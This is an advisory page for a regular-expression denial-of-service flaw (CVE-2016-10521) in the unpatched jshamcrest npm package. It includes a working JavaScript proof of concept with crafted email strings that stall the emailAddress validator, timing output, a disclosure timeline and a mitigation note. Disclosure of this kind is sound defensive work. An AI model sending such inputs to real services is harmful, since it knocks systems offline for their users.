Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXhqNjItODdwZy12Y3Yz

Regular Expression Denial of Service in jshamcrest

The jshamcrest package is affected by a regular expression denial of service vulnerability when certain types of user input are passed in to the emailAddress validator.

Proof of concept

var js = require('jshamcrest')
var emailAddress = new js.JsHamcrest.Matchers.emailAddress();


var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}


for (i=1;i<=10000000;i=i+1) {
    console.log("COUNT: " + i);
    var str = '66666666666666666666666666666@ffffffffffffffffffffffffffffffff.' + genstr(i, 'a') + '{'
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    emailAddress.matches(str)

    var end = process.hrtime(start);
    console.log(end);
}

Results

It takes about 116 characters to get a 1.6 second event loop block.

[ 1, 633084590 ]
COUNT: 51
LENGTH: 116

Timeline

October 25, 2015 - Vulnerability Identified
October 25, 2015 - Maintainers notified (no response)

Recommendation

The jshamcrest package currently has no patched versions available.

At this time, the best available mitigation is to use an alternative module that is actively maintained and provides similar functionality. There are multiple modules fitting this criteria available on npm..

Permalink: https://github.com/advisories/GHSA-xj62-87pg-vcv3
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLXhqNjItODdwZy12Y3Yz
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: almost 6 years ago
Updated: about 1 year ago

CVSS Score: 7.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Identifiers: GHSA-xj62-87pg-vcv3, CVE-2016-10521
References:

Blast Radius: 11.0

Affected Packages

npm:jshamcrest

Dependent packages: 23
Dependent repositories: 29
Downloads: 1,157 last month
Affected Version Ranges: <= 0.7.1
No known fixed version
All affected versions: 0.6.7, 0.7.0, 0.7.1